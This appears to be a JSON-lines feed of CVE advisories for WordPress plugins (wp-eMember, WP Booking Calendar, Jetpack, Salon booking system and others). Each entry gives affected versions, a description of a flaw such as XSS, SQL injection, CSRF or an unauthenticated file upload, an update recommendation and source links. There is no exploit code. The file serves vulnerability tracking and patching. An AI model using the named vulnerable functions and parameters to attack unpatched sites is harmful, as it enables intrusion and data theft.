{"CVE_ID":"CVE-2024-5075","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b47d93d6-5511-451a-853f-c8b0fba20969\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b47d93d6-5511-451a-853f-c8b0fba20969\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5074","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/174a2ba8-0215-480f-93ec-83ebc4a3200e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/174a2ba8-0215-480f-93ec-83ebc4a3200e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10893","slug":"booking","versionImpact":"10.6.4","versionEndExcluding":"10.6.5","description":"The WP Booking Calendar WordPress plugin before 10.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 10.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a230a552-3fda-4145-810f-58af540107db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a230a552-3fda-4145-810f-58af540107db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10027","slug":"booking","versionImpact":"10.6.2","versionEndExcluding":"10.6.3","description":"The WP Booking Calendar WordPress plugin before 10.6.3 does not sanitise and escape some of its Widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 10.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a94c7b64-720a-47f1-a74a-691c3a9ed3a1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a94c7b64-720a-47f1-a74a-691c3a9ed3a1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9306","slug":"booking","versionImpact":"10.6","versionEndExcluding":"10.6.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 10.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. In addition, site administrators have the option to grant lower-level users with access to manage the plugin's settings which may extend this vulnerability to those users.","recommendation":"Update to version 10.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/128d45ec-941c-414c-b341-9964dc748132?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/128d45ec-941c-414c-b341-9964dc748132?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161259%40booking&new=3158531%40booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161259%40booking&new=3158531%40booking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8274","slug":"booking","versionImpact":"10.5","versionEndExcluding":"10.5.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters from 'timeline_obj' in all versions up to, and including, 10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 10.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83804c2a-2c4a-4f69-b833-dcd53ddab94d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83804c2a-2c4a-4f69-b833-dcd53ddab94d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/tags\\\/10.4\\\/core\\\/timeline\\\/v2\\\/wpbc-class-timeline_v2.php#L520\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/tags\\\/10.4\\\/core\\\/timeline\\\/v2\\\/wpbc-class-timeline_v2.php#L520\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143364\\\/booking\\\/trunk\\\/core\\\/timeline\\\/v2\\\/wpbc-class-timeline_v2.php?old=3139443&old_path=booking%2Ftrunk%2Fcore%2Ftimeline%2Fv2%2Fwpbc-class-timeline_v2.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143364\\\/booking\\\/trunk\\\/core\\\/timeline\\\/v2\\\/wpbc-class-timeline_v2.php?old=3139443&old_path=booking%2Ftrunk%2Fcore%2Ftimeline%2Fv2%2Fwpbc-class-timeline_v2.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11582","slug":"subscribe2","versionImpact":"10.43","versionEndExcluding":"10.44","description":"The Subscribe2 \u2013 Form, Email Subscribers & Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ip parameter in all versions up to, and including, 10.43 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 10.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/tags\\\/10.43\\\/classes\\\/class-s2-list-table.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/tags\\\/10.43\\\/classes\\\/class-s2-list-table.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36777e39-be45-41f2-beca-2971e15b77cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36777e39-be45-41f2-beca-2971e15b77cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4749","slug":"wp-emember","versionImpact":"10.3.8","versionEndExcluding":"10.3.9","description":"The wp-eMember WordPress plugin before 10.3.9 does not sanitize and escape the \"fieldId\" parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.","recommendation":"Update to version 10.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cc05a33-6592-4d35-8e66-9b6a9884df7e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cc05a33-6592-4d35-8e66-9b6a9884df7e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3229","slug":"salon-booking-system","versionImpact":"10.2","versionEndExcluding":"10.3","description":"The Salon booking system plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the SLN_Action_Ajax_ImportAssistants function along with missing authorization checks in all versions up to, and including, 10.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bbbf5be-5c0a-4514-88ac-003083c0bba3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bbbf5be-5c0a-4514-88ac-003083c0bba3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103584\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Action\\\/Ajax\\\/ImportAssistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103584\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Action\\\/Ajax\\\/ImportAssistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6790","slug":"quiz-master-next","versionImpact":"10.2.2","versionEndExcluding":"10.2.3","description":"The Quiz and Survey Master (QSM) WordPress plugin before 10.2.3 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","recommendation":"Update to version 10.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af337f9f-c955-49eb-9675-2f85da96fcfe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af337f9f-c955-49eb-9675-2f85da96fcfe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4858","slug":"testimonials-carousel-elementor","versionImpact":"10.2.0","versionEndExcluding":"10.2.1","description":"The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_testimonials_option_callback' function in versions up to, and including, 10.2.0. This makes it possible for unauthenticated attackers to update the OpenAI API key, disabling the feature.","recommendation":"Update to version 10.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f589345-a081-4d27-ac4a-6edc44b96f91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f589345-a081-4d27-ac4a-6edc44b96f91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/class-testimonials-carousel-elementor.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/class-testimonials-carousel-elementor.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092154\\\/testimonials-carousel-elementor\\\/trunk\\\/class-testimonials-carousel-elementor.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092154\\\/testimonials-carousel-elementor\\\/trunk\\\/class-testimonials-carousel-elementor.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4698","slug":"testimonials-carousel-elementor","versionImpact":"10.1.1","versionEndExcluding":"10.2.0","description":"The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'show_line_text' and 'slide_button_hover_animation' parameters in versions up to, and including, 10.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 10.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4542b0f8-c9ee-4992-b737-e5f727c7b5b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4542b0f8-c9ee-4992-b737-e5f727c7b5b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-bottom.php#L1478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-bottom.php#L1478\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-centered.php#L1619\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-centered.php#L1619\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-gallery-coverflow.php#L1876\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-gallery-coverflow.php#L1876\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-logo.php#L1715\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-logo.php#L1715\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel.php#L1847\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel.php#L1847\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-blog.php#L1076\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-blog.php#L1076\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087862\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087862\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13821","slug":"booking","versionImpact":"10.10","versionEndExcluding":"10.10.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Unauthenticated Post-Confirmation Booking Manipulation in all versions up to, and including, 10.10. This is due to the plugin not properly requiring re-verification after a booking has been made and a change is being attempted. This makes it possible for unauthenticated attackers to manipulate their confirmed bookings, even after they have been approved.","recommendation":"Update to version 10.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234469%40booking&new=3234469%40booking&sfp_email=&sfph_mail=#file20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234469%40booking&new=3234469%40booking&sfp_email=&sfph_mail=#file20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a0b961e-ccc3-4da0-b007-bbafa133a3a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a0b961e-ccc3-4da0-b007-bbafa133a3a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5429","slug":"information-reel","versionImpact":"10.0","versionEndExcluding":"10.1","description":"The Information Reel plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985373\\\/information-reel#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985373\\\/information-reel#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64db63e5-ff76-494a-be4f-d820f0cc9ab0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64db63e5-ff76-494a-be4f-d820f0cc9ab0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/information-reel\\\/trunk\\\/information-reel.php?rev=2827123#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/information-reel\\\/trunk\\\/information-reel.php?rev=2827123#L134\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9926","slug":"jetpack","versionImpact":"9.9.2","versionEndExcluding":"10.0.2","description":"The Jetpack WordPress plugin does not have proper authorisation on one of its REST endpoints, allowing any authenticated user, such as a subscriber, to read arbitrary feedback data sent via the Jetpack Contact Form","recommendation":"Update to one of the following versions, or a newer patched version: 3.9.10, 4.0.7, 4.1.4, 4.2.5, 4.3.5, 4.4.5, 4.5.3, 4.6.3, 4.7.4, 4.8.5, 4.9.3, 5.0.3, 5.1.4, 5.2.5, 5.3.4, 5.4.4, 5.5.5, 5.6.5, 5.7.5, 5.8.4, 5.9.4, 6.0.4, 6.1.5, 6.2.5, 6.3.7, 6.4.6, 6.5.4, 6.6.5, 6.7.4, 6.8.5, 6.9.4, 7.0.5, 7.1.5, 7.2.5, 7.3.5, 7.4.5, 7.5.7, 7.6.4, 7.7.6, 7.8.4, 7.9.4, 8.0.3, 8.1.4, 8.2.6, 8.3.3, 8.4.5, 8.5.3, 8.6.4, 8.7.4, 8.8.5, 8.9.4, 9.0.5, 9.1.3, 9.2.4, 9.3.5, 9.4.4, 9.5.5, 9.6.4, 9.7.3, 9.8.3, 9.9.3, 10.0.2, 10.1.2, 10.2.3, 10.3.2, 10.4.2, 10.5.3, 10.6.2, 10.7.2, 10.8.2, 10.9.3, 11.0.2, 11.1.4, 11.2.2, 11.3.4, 11.4.2, 11.5.3, 11.6.2, 11.7.3, 11.8.6, 11.9.3, 12.0.2, 12.1.2, 12.2.2, 12.3.1, 12.4.1, 12.5.1, 12.6.3, 12.7.2, 12.8.2, 12.9.4, 13.0.1, 13.1.4, 13.2.3, 13.3.2, 13.4.4, 13.5.1, 13.6.1, 13.7.1, 13.8.2, 13.9.1","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/669382af-f836-4896-bdcb-5c6a57c99bd9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/669382af-f836-4896-bdcb-5c6a57c99bd9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13705","slug":"stageshow","versionImpact":"9.8.6","versionEndExcluding":"10.0","description":"The StageShow plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 9.8.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stageshow\\\/trunk\\\/admin\\\/stageshow_manage_seating.php#L502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stageshow\\\/trunk\\\/admin\\\/stageshow_manage_seating.php#L502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c5a6436-1a08-4b3d-ab85-e5f75f216ab8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c5a6436-1a08-4b3d-ab85-e5f75f216ab8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4468","slug":"salon-booking-system","versionImpact":"9.9","versionEndExcluding":"10.0","description":"The Salon booking system plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on several functions hooked into admin_init in all versions up to, and including, 9.9. This makes it possible for authenticated attackers with subscriber access or higher to modify plugin settings and view discount codes intended for other users.","recommendation":"Update to version 10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b73f864-68b5-4ba8-93a3-37f2564cc240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b73f864-68b5-4ba8-93a3-37f2564cc240?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L231\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php#L231\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098413\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098413\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Tools.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098413\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098413\\\/salon-booking-system\\\/trunk\\\/src\\\/SLB_Discount\\\/Admin\\\/ExportDiscountsCsv.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11417","slug":"dejureorg-vernetzungsfunktion","versionImpact":"1.97.5","versionEndExcluding":"1.98.0","description":"The dejure.org Vernetzungsfunktion plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.97.5. This is due to missing or incorrect nonce validation on the djo_einstellungen_menue() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.98.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dejureorg-vernetzungsfunktion\\\/trunk\\\/dejure.org-vernetzung.php#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dejureorg-vernetzungsfunktion\\\/trunk\\\/dejure.org-vernetzung.php#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfe35762-2cb1-4b62-8865-ab217ff29450?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfe35762-2cb1-4b62-8865-ab217ff29450?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13635","slug":"vk-blocks","versionImpact":"1.94.2.2","versionEndExcluding":"1.95.0.3","description":"The VK Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.94.2.2 via the page content block. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the content of private posts and pages.","recommendation":"Update to version 1.95.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/page-content\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/page-content\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233455\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/page-content\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233455\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/page-content\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3233455%40vk-blocks%2Ftrunk&old=3227170%40vk-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3233455%40vk-blocks%2Ftrunk&old=3227170%40vk-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc03b3f4-2edb-463b-812b-6a187a7a893c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc03b3f4-2edb-463b-812b-6a187a7a893c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6159","slug":"push-notification-for-post-and-buddypress","versionImpact":"1.93","versionEndExcluding":"1.94","description":"The Push Notification for Post and BuddyPress WordPress plugin before 1.9.4 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"Update to version 1.94, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de20ebda-b0bc-489e-a8d3-e9487a2b48e8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de20ebda-b0bc-489e-a8d3-e9487a2b48e8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
